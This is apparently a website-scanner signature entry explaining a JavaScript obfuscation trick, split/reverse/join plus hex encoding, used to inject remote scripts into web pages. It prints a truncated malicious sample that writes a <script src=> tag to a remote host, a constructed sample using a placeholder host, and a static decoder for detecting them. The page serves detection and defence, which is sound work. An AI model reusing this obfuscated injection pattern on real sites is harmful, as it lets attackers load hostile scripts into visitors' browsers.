SiteCheck Signatures


malware.hex_reverse_script

Description:
Suspicious code that uses the .split("").reverse().join("") trick to obfuscate injection of scripts into a web page.

Many malicious scripts add one more layer of obfuscation by applying a common JavaScript obfuscator, so that the reversed script is hex-encoded. For example:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38...skipped...\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

where "\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C" decodes to "=crs tpircs<" and then to "<script src=".
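The two decoding steps above can be reproduced statically, without evaluating the suspect code. The following is an added example, not SiteCheck's own detection logic: the function names are hypothetical, and the sample is constructed in the style of the snippet above with example.invalid as a placeholder host.

```javascript
// Constructed sample (not from a real infection); example.invalid is a placeholder host.
const SAMPLE = String.raw`var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x61\x2F\x64\x69\x6C\x61\x76\x6E\x69\x2E\x65\x6C\x70\x6D\x61\x78\x65\x2F\x2F\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))`;

// Step 1: turn \xNN escapes into characters. Pure text processing, nothing is executed.
function decodeHexEscapes(body) {
  return body.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) =>
    String.fromCharCode(parseInt(h, 16)));
}

// Collect every quoted literal that contains at least one \xNN escape, decoded.
function hexLiterals(source) {
  const out = [];
  const re = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  for (const m of source.matchAll(re)) {
    if (/\\x[0-9A-Fa-f]{2}/.test(m[2])) out.push(decodeHexEscapes(m[2]));
  }
  return out;
}

// Step 2: reverse each decoded literal and look for a script tag.
// A source is flagged only when the hex-encoded literals also spell out the
// split/reverse/join helpers the obfuscated code needs at run time.
function analyze(source) {
  const decoded = hexLiterals(source);
  const helpers = ["split", "reverse", "join"].every((n) => decoded.includes(n));
  const payloads = decoded
    .map((s) => s.split("").reverse().join(""))
    .filter((s) => /<script\b/i.test(s));
  return { suspicious: helpers && payloads.length > 0, helpers, payloads };
}

console.log(analyze(SAMPLE));
```

The `payloads` array holds the recovered script tags, so the injected URL can be read from the report without loading the page in a browser.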

Affecting: Any web site (no specific target).